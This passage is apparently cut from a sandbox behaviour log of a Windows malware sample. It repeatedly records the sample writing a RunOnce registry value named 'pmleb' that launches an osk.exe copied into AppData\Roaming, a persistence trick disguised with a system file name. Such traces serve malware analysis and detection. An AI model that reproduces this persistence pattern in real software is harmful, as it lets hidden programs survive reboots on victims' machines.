lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.396] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.396] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.397] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.397] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.397] RegCloseKey (hKey=0x280) returned 0x0 [0079.397] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.397] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.397] SetTimer (hWnd=0x20280, nIDEvent=0x2038, uElapse=0xa, lpTimerFunc=0x0) returned 0x2038 [0079.397] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.409] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0079.409] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.410] KillTimer (hWnd=0x20280, uIDEvent=0x2038) returned 1 [0079.410] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.410] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.410] IUnknown:Release (This=0x787518) returned 0x1 [0079.410] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.410] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.410] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.410] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0079.410] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.411] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x39 [0079.411] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.411] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3a [0079.411] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.412] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x39 [0079.412] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.412] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.412] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.412] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.412] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.412] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.412] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.412] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.413] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.413] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.413] RegCloseKey (hKey=0x280) returned 0x0 [0079.413] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.413] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.413] SetTimer (hWnd=0x20280, nIDEvent=0x2039, uElapse=0xa, lpTimerFunc=0x0) returned 0x2039 [0079.413] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.435] KillTimer (hWnd=0x20280, uIDEvent=0x2039) returned 1 [0079.435] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.435] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.435] IUnknown:Release (This=0x787518) returned 0x1 [0079.436] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.436] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.436] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.436] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.436] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3a [0079.436] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.436] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3b [0079.436] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.437] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3a [0079.437] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.437] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.437] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.437] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.437] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.437] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.438] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.438] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.438] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.438] RegCloseKey (hKey=0x280) returned 0x0 [0079.438] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.438] SetTimer (hWnd=0x20280, nIDEvent=0x203a, uElapse=0xa, lpTimerFunc=0x0) returned 0x203a [0079.438] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.441] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.441] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.441] KillTimer (hWnd=0x20280, uIDEvent=0x203a) returned 1 [0079.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.441] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.441] IUnknown:Release (This=0x787518) returned 0x1 [0079.441] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.441] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.441] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.442] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.442] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3b [0079.442] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.442] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3c [0079.442] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.443] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3b [0079.443] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.443] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.443] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.443] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.443] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 